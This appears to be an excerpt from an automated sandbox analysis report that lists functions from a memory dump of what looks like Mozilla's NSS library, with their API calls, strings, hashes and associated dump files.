Opcode Fuzzy Hash: 8ac9b149b641ce2819d3ad389107809177eb27d4c7707c5726687125a5fd7a22
Instruction Fuzzy Hash: 8D01D472A042109FE720CF2A9C45F2773ADDBC9A45B05842DEA09D3252E762EC1587E1

Function 6D531CC0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Initialize), ref: 6D531CD8
PR_LogPrint.NSS3( pInitArgs = 0x%p,?), ref: 6D531CF1

Part of subcall function 6D6109D0: PR_Now.NSS3 ref: 6D610A22
Part of subcall function 6D6109D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6D610A35
Part of subcall function 6D6109D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6D610A66
Part of subcall function 6D6109D0: PR_GetCurrentThread.NSS3 ref: 6D610A70
Part of subcall function 6D6109D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6D610A9D
Part of subcall function 6D6109D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6D610AC8
Part of subcall function 6D6109D0: PR_vsmprintf.NSS3(?,?), ref: 6D610AE8
Part of subcall function 6D6109D0: EnterCriticalSection.KERNEL32(?), ref: 6D610B19
Part of subcall function 6D6109D0: OutputDebugStringA.KERNEL32(00000000), ref: 6D610B48
Part of subcall function 6D6109D0: _PR_MD_UNLOCK.NSS3(?), ref: 6D610C76
Part of subcall function 6D6109D0: PR_LogFlush.NSS3 ref: 6D610C7E

Strings

nam, xrefs: 6D531D09, 6D531D30
C_Initialize, xrefs: 6D531CD3
pInitArgs = 0x%p, xrefs: 6D531CEC

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: PrintR_snprintf$CriticalCurrentDebugEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime
String ID: pInitArgs = 0x%p$C_Initialize$nam
API String ID: 1907330108-751804826
Opcode ID: 7a4fec3dcddc39b348116421958216d4a96d9a6e3d6b1dd5dc53bdd2b39a1d61
Instruction ID: 180a2092d4de2244cbb40902a995604d6eb060f5862b25ae1c5c2fc462bdab00
Opcode Fuzzy Hash: 7a4fec3dcddc39b348116421958216d4a96d9a6e3d6b1dd5dc53bdd2b39a1d61
Instruction Fuzzy Hash: 8E01CC345081A0AFCB149B6ADC08F3573B4EBCA365F0A4828E609C3211EB749845C7A2

Function 6D5AAC00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,@]Ym,00000000,?,?,6D586AC6,?), ref: 6D5AAC2D

Part of subcall function 6D54ADC0: TlsGetValue.KERNEL32(?,6D52CDBB,?,6D52D079,00000000,00000001), ref: 6D54AE10
Part of subcall function 6D54ADC0: EnterCriticalSection.KERNEL32(?,?,6D52CDBB,?,6D52D079,00000000,00000001), ref: 6D54AE24
Part of subcall function 6D54ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6D52D079,00000000,00000001), ref: 6D54AE5A
Part of subcall function 6D54ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6D52CDBB,?,6D52D079,00000000,00000001), ref: 6D54AE6F
Part of subcall function 6D54ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6D52CDBB,?,6D52D079,00000000,00000001), ref: 6D54AE7F
Part of subcall function 6D54ADC0: TlsGetValue.KERNEL32(?,6D52CDBB,?,6D52D079,00000000,00000001), ref: 6D54AEB1
Part of subcall function 6D54ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6D52CDBB,?,6D52D079,00000000,00000001), ref: 6D54AEC9

PK11_FreeSymKey.NSS3(?,@]Ym,00000000,?,?,6D586AC6,?), ref: 6D5AAC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]Ym,00000000,?,?,6D586AC6,?), ref: 6D5AAC59
free.MOZGLUE(8CB6FF01,6D586AC6,?,?,?,?,?,?,?,?,?,?,6D595D40,00000000,?,6D59AAD4), ref: 6D5AAC62

Strings

@]Ym, xrefs: 6D5AAC05

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID: @]Ym
API String ID: 1595327144-2253308218
Opcode ID: a53bbcdbae71bfaa3742d08a0e41bdb1aabc33d041315b2364af766815015aea
Instruction ID: 8588ae98f09ce2135ca496c87e019a213902bbdf990e62fe468243761d8b0d53
Opcode Fuzzy Hash: a53bbcdbae71bfaa3742d08a0e41bdb1aabc33d041315b2364af766815015aea
Instruction Fuzzy Hash: 76014BB56002119FEB04CF15E8D0F5AB7A8AF84718F098469F9498F706D731EC44CBA2

Function 6D482940 Relevance: 7.8, APIs: 6, Instructions: 327stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6D481360,00000000), ref: 6D482A19
memcpy.VCRUNTIME140(?,00000009,00000034,?,?,?,6D481360,00000000), ref: 6D482A45
memcpy.VCRUNTIME140(?,00000000,00000000), ref: 6D482A7C

Part of subcall function 6D482D50: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,93857CC8,?,?,00000000,?,6D48296E), ref: 6D482DA4

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D482AF3
memcpy.VCRUNTIME140(?,00000009,0000000C,?,?,?,6D481360,00000000), ref: 6D482B71
memset.VCRUNTIME140(00000000,00000000,00000034), ref: 6D482B90

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: memcpystrlen$memset
String ID:
API String ID: 638109778-0
Opcode ID: 0cf440b5b0c1e691852cf433f68bf516e4fbc16407163c3fb6780dafe335f368
Instruction ID: 6b70864bcc369ae1d46e3c1c48aaeab442f384e34114b07cfb8087f6ab3b49c8
Opcode Fuzzy Hash: 0cf440b5b0c1e691852cf433f68bf516e4fbc16407163c3fb6780dafe335f368
Instruction Fuzzy Hash: 57C17271F046069BEB28CF69C8D0B7AB7A5BF88354F158169D9199B342DB30EC42CBD1

Function 6D499C60 Relevance: 7.8, APIs: 6, Instructions: 262COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6D499CF2
LeaveCriticalSection.KERNEL32(?), ref: 6D499D45
EnterCriticalSection.KERNEL32(?), ref: 6D499D8B
LeaveCriticalSection.KERNEL32(?), ref: 6D499DDE

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: e37181fee301e55be7efd63645f76789d5286b9f80bb66c60e0342c68ca38847
Instruction ID: e35e9e9769fab190d4b5f2317afb889476ba36e749f6463e37c37be091503c20
Opcode Fuzzy Hash: e37181fee301e55be7efd63645f76789d5286b9f80bb66c60e0342c68ca38847
Instruction Fuzzy Hash: E0A18B31A081418FEF09DF66D998B7A7B75BB87710F18112DD4068B345DB3AAC82CB83

Function 6D49A910 Relevance: 7.7, APIs: 5, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0a86aec1e2d6bf57b6f2b640314a927daca64b5796b64a8bac0d56b06092ef
Instruction ID: 2216a316dc5e0fdeb00b764a40dc289dd8b278c5163cc798dba241e7c5ccfee5
Opcode Fuzzy Hash: 0f0a86aec1e2d6bf57b6f2b640314a927daca64b5796b64a8bac0d56b06092ef
Instruction Fuzzy Hash: D691B3719042458FDF08DF66D89AF7A7BB5BF4A305F14042DE6468B341DB38AD81CB92

Function 6D5ADD70 Relevance: 7.7, APIs: 5, Instructions: 179COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6D5ADD8C
LeaveCriticalSection.KERNEL32(00000000), ref: 6D5ADDB4
LeaveCriticalSection.KERNEL32(00000000), ref: 6D5ADE1B
ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6D5ADE77

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CriticalLeaveSection$ReleaseSemaphoreValue
String ID:
API String ID: 2700453212-0
Opcode ID: 0d20cc1cef9875585a9f4e5b9a7ac438b841495c7e03862cac0dbb663659206c
Instruction ID: 9157ed3c8a0649f864317838acaebf278109bf2c62aaa1e9a06330491b77f2c3
Opcode Fuzzy Hash: 0d20cc1cef9875585a9f4e5b9a7ac438b841495c7e03862cac0dbb663659206c
Instruction Fuzzy Hash: 62715471A00325CBDB18DF99C5806AEB7B4BF89714F29846EDD596B702E730AD41CF90

Function 6D51C9E0 Relevance: 7.6, APIs: 5, Instructions: 132COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,?,00000000), ref: 6D51CA21
EnterCriticalSection.KERNEL32(0000001C), ref: 6D51CA35
PR_Unlock.NSS3(00000000), ref: 6D51CA66
PR_SetError.NSS3(FFFFE041,00000000,00000000,?,?,00000000), ref: 6D51CA77
PR_Unlock.NSS3(00000000), ref: 6D51CAFC

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Unlock$CriticalEnterErrorSectionValue
String ID:
API String ID: 1974170392-0
Opcode ID: 51f2e02437b318a26e15af7a293bf209149b844c1da5f3c762240015fcc80de3
Instruction ID: 0bfe684d1ddf8f776eb21d20842a4b957ad4bee7e774bc3d04e966a655f474ec
Opcode Fuzzy Hash: 51f2e02437b318a26e15af7a293bf209149b844c1da5f3c762240015fcc80de3
Instruction Fuzzy Hash: 6C41FF75A082069BEF09DF64DC41A7ABBB4AF85304F054428ED18A7701EB32ED15CBE2

Function 6D4FEDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6D4FEDFD
calloc.MOZGLUE(00000001,00000000), ref: 6D4FEE64
PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6D4FEECC
memcpy.VCRUNTIME140(00000000,?,?), ref: 6D4FEEEB
free.MOZGLUE(?), ref: 6D4FEEF6

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: ErrorValuecallocfreememcpy
String ID:
API String ID: 3833505462-0
Opcode ID: 0681ed2752851f7e4efaba234ad8b8c0c0572d11a98469e437dafa8210286f2c
Instruction ID: 057b1bec4cce8a2a4894d563e1e508a4cc05cc18bee5da743493c1513fec28a9
Opcode Fuzzy Hash: 0681ed2752851f7e4efaba234ad8b8c0c0572d11a98469e437dafa8210286f2c
Instruction Fuzzy Hash: B531D4715042419BE7218F29EC81F767BB4FB86702F150539ED9AC7260D731ED52C7A2

Function 6D511F10 Relevance: 7.6, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6D511F1C

Part of subcall function 6D560FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6D5087ED,00000800,6D4FEF74,00000000), ref: 6D561000
Part of subcall function 6D560FF0: PR_NewLock.NSS3(?,00000800,6D4FEF74,00000000), ref: 6D561016
Part of subcall function 6D560FF0: PL_InitArenaPool.NSS3(00000000,security,6D5087ED,00000008,?,00000800,6D4FEF74,00000000), ref: 6D56102B

SEC_ASN1EncodeItem_Util.NSS3(00000000,0000000100000017,FFFFFFFF,6D629EBC), ref: 6D511FB8
SEC_ASN1EncodeItem_Util.NSS3(6D629E9C,?,?,6D629E9C), ref: 6D51200A
PR_SetError.NSS3(FFFFE022,00000000), ref: 6D512020

Part of subcall function 6D506A60: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6D50AD50,?,?), ref: 6D506A98

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6D512030

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$ArenaArena_EncodeItem_$Alloc_ErrorFreeInitLockPoolcalloc
String ID:
API String ID: 1390266749-0
Opcode ID: de63077ccab6f6c429276f79269cf1ca4ae147ec3401078b4c8fff33249f1908
Instruction ID: ee8b1a266a82527cfa302ac2c9d1b71ad8a6fdb19c92e24d3fd63d34e106559b
Opcode Fuzzy Hash: de63077ccab6f6c429276f79269cf1ca4ae147ec3401078b4c8fff33249f1908
Instruction Fuzzy Hash: DC214875908603BBF7198A15DC41FBB7768FF96319F040615F92892A90E731FA24CBB1

Function 6D501DD0 Relevance: 7.6, APIs: 5, Instructions: 81timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6D501E0B
DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6D501E24
PR_SetError.NSS3(FFFFE005,00000000), ref: 6D501E3B
PR_SetError.NSS3(FFFFE00B,00000000), ref: 6D501E8A
PR_SetError.NSS3(FFFFE00B,00000000), ref: 6D501EAD

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Error$Choice_DecodeTimeUtil
String ID:
API String ID: 1529734605-0
Opcode ID: fd88830ffbf672d4fe26f4ad6bf480ecfaf19d723d460fc4cbf9f551f91e43e3
Instruction ID: fb2c95fba845b396c652d7d9c59bce546edfd91ec698b20046a959f1e27534a2
Opcode Fuzzy Hash: fd88830ffbf672d4fe26f4ad6bf480ecfaf19d723d460fc4cbf9f551f91e43e3
Instruction Fuzzy Hash: F921F172E08211ABD7098E68DC40F6E7794ABC4328F058A38EE5997781E7309D0486E3

Function 6D50AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6D503FFF,00000000,?,?,?,?,?,6D501A1C,00000000,00000000), ref: 6D50ADA7

Part of subcall function 6D5614C0: TlsGetValue.KERNEL32 ref: 6D5614E0
Part of subcall function 6D5614C0: EnterCriticalSection.KERNEL32 ref: 6D5614F5
Part of subcall function 6D5614C0: PR_Unlock.NSS3 ref: 6D56150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6D503FFF,00000000,?,?,?,?,?,6D501A1C,00000000,00000000), ref: 6D50ADB4

Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D5610F3
Part of subcall function 6D5610C0: EnterCriticalSection.KERNEL32(?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56110C
Part of subcall function 6D5610C0: PL_ArenaAllocate.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561141
Part of subcall function 6D5610C0: PR_Unlock.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561182
Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6D503FFF,?,?,?,?,6D503FFF,00000000,?,?,?,?,?,6D501A1C,00000000), ref: 6D50ADD5

Part of subcall function 6D55FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6D558D2D,?,00000000,?), ref: 6D55FB85
Part of subcall function 6D55FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6D55FBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6D6294B0,?,?,?,?,?,?,?,?,6D503FFF,00000000,?), ref: 6D50ADEC

Part of subcall function 6D55B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D6318D0,?), ref: 6D55B095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6D503FFF), ref: 6D50AE3C

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID:
API String ID: 2372449006-0
Opcode ID: bf10ab8363e53e42f744cf728aa6387f101a273c02f1084c45553d917454c28d
Instruction ID: fa3c8cd94902aea06c5e1090330f02211b8eaba42a0cea196458273e640394b6
Opcode Fuzzy Hash: bf10ab8363e53e42f744cf728aa6387f101a273c02f1084c45553d917454c28d
Instruction Fuzzy Hash: 2A117472E043056BEB089B64AC01F7F73B8DFD124DF044629EE5997641FB20AD9482E2

Function 6D558800 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6D56085A,00000000,?,6D508369,?), ref: 6D558821
TlsGetValue.KERNEL32(?,?,6D56085A,00000000,?,6D508369,?), ref: 6D55883D
EnterCriticalSection.KERNEL32(?,?,?,6D56085A,00000000,?,6D508369,?), ref: 6D558856
PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6D558887
PR_Unlock.NSS3(?,?,?,?,6D56085A,00000000,?,6D508369,?), ref: 6D558899

Part of subcall function 6D4F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6D48204A), ref: 6D4F07AD
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D48204A), ref: 6D4F07CD
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D48204A), ref: 6D4F07D6
Part of subcall function 6D4F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6D48204A), ref: 6D4F07E4
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,6D48204A), ref: 6D4F0864
Part of subcall function 6D4F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6D4F0880
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,?,6D48204A), ref: 6D4F08CB
Part of subcall function 6D4F07A0: TlsGetValue.KERNEL32(?,?,6D48204A), ref: 6D4F08D7
Part of subcall function 6D4F07A0: TlsGetValue.KERNEL32(?,?,6D48204A), ref: 6D4F08FB

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
String ID:
API String ID: 2759447159-0
Opcode ID: 3a057638749350db41976f1b4ef9023dfa0dbaaf9fe8e9af1c236dee5ddd0d79
Instruction ID: 725e324304553c5ce8952077059d155a05dc3ba8401675c367b4f1701d3250b8
Opcode Fuzzy Hash: 3a057638749350db41976f1b4ef9023dfa0dbaaf9fe8e9af1c236dee5ddd0d79
Instruction Fuzzy Hash: 37219FB4814606CFCB01EF79C48566ABBF0FF45304F014EAADD9496211EB30E8A5CB93

Function 6D4F09E0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,?,?,6D4F06A2,00000000,?), ref: 6D4F09F8
malloc.MOZGLUE(0000001F), ref: 6D4F0A18
memcpy.VCRUNTIME140(?,?,00000001), ref: 6D4F0A33

Part of subcall function 6D4F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6D48204A), ref: 6D4F07AD
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D48204A), ref: 6D4F07CD
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D48204A), ref: 6D4F07D6
Part of subcall function 6D4F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6D48204A), ref: 6D4F07E4
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,6D48204A), ref: 6D4F0864
Part of subcall function 6D4F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6D4F0880
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,?,6D48204A), ref: 6D4F08CB
Part of subcall function 6D4F07A0: TlsGetValue.KERNEL32(?,?,6D48204A), ref: 6D4F08D7
Part of subcall function 6D4F07A0: TlsGetValue.KERNEL32(?,?,6D48204A), ref: 6D4F08FB

PR_Free.NSS3(?), ref: 6D4F0A6C
